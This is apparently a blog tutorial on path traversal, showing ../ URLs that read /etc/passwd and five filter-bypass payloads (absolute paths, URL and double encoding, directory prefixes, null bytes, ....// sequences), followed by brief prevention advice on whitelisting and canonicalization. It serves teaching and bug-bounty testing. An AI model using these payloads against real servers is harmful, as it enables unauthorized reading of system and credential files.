Path Traversal — A tour to the web server’s assets

infosecwriteups.com · PriOFF · 8 days ago · tutorial
quality 7/10 · good
0 net
Tags
bug-bounty cloudflare lfi pentest
Path Traversal — A tour to the web server's assets | by PriOFF - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Path Traversal — A tour to the web server's assets Path traversal, also known as Directory traversal, is a vulnerability that can reveal sensitive information stored on the web server. PriOFF Follow ~3 min read · July 17, 2025 (Updated: July 17, 2025) · Free: Yes Path traversal vulnerability can be easily found on vulnerable websites, which enables attacker to read file's content, including passwd file, configuration files, database files, etc. Before understanding the path traversal vulnerability, Let's just first understand what is " Path" in the terms of web. Structure of an URL As you can see in above image, After the domain or top level domain, Path is specified to serve a specific file to the client. Now, as we change the path of the URL, we can assess different files stored on server. Assume: we have a website that serves cats.png file to the client. https://www.example.com/images?file=cats.png Now, if the website is running on Linux system, so typically the actual path of the cats.png should be as given below (in general). /var/www/images/cats.png Now, to access the sensitive file "/etc/passwd", we have to go back three directories back and then put "/etc/passwd" in the url Original url: https://www.example.com/images?file=cats.png Updated url: https://www.example.com/images?file=../../../etc/passwd which will show the content of the /etc/passwd file which stores users' details. To prevent such type of attacks, website uses various filters. But there are still some ways to bypass those filters. Some techniques are shown below: 1. Use Absolute path: Try absolute path of the file, instead of relative path: Try this: https://www.example.com/images?file=/etc/passwd Instead of this: https://www.example.com/images?file=../../../etc/passwd Absolute path: /etc/passwd Relative path: ../../../etc/passwd 2. Use URL-Encoding: Sometimes server, revomes "../" term from url, but you can use single URL Encoding or even Double URL Encoding. URL: https://www.example.com/images?file=../../etc/passwd single url encoded: https://www.example.com/images?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd double url encoded: https://www.example.com/images?file=%252e%252e%252f%252e%252e%252fetc%252passwd single encoding of ../ = %2e%2e%2f double encoding of ../ = %252e%252e%252f 3. Use specific directory path in the url: Sometimes, server filter like that you must put specific directory in the url to validate it. URL: https://www.example.com/images?file=/var/www/images/cats.png Here, /var/www/images/ directory must be present in the url. In such case, Try this: https://www.example.com/images?file=/var/www/images/../../../etc/passwd 4. Use specific extension of the file in the url: Server may filter specific extension of the file, so user can't steal sensitive data from file. But you can bypass it using "null byte" URL: https://www.example.com/images?file=cats.png Here .png must be present in the url. In such case, Try this: https://www.example.com/images?file=../../../etc/passwd%00.png Here, "%00" indicates null byte, which tells to the server that "Ignore the rest of the part of the url after %00" indicating the end of string. 5. Use ….// or ….\/ for traversal Web server may filter ../ string from the url, but you can use ….// or ….\/ in the url. So even if server strip ../ from the url you can still have another ../ in the url. URL: https://www.example.com/images?file=....//....//....//etc/passwd server will strip ../ from the url. removing http://www.example.com/images?files=.. '../' /.. '../' /.. '../' /etc/passwd The url will be look after striping: https://www.example.com/images?file=../../../etc/passwd Example: Using Absolute Path Accessing /etc/passwd file How to prevent: Validate the user input before processing it. Ideally, compare the user input with a whitelist of permitted values. If that isn't possible, verify that the input contains only permitted content, such as alphanumeric characters only. After validating the supplied input, append the input to the base directory and use a platform filesystem API to canonicalize the path. Verify that the canonicalized path starts with the expected base directory. absolute path: \var\www\images\..\images\cats.png canonical path: \var\www\images\cats.png #path-traversal #bug-bounty #vulnerability #owasp-top-10 #web-penetration-testing Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories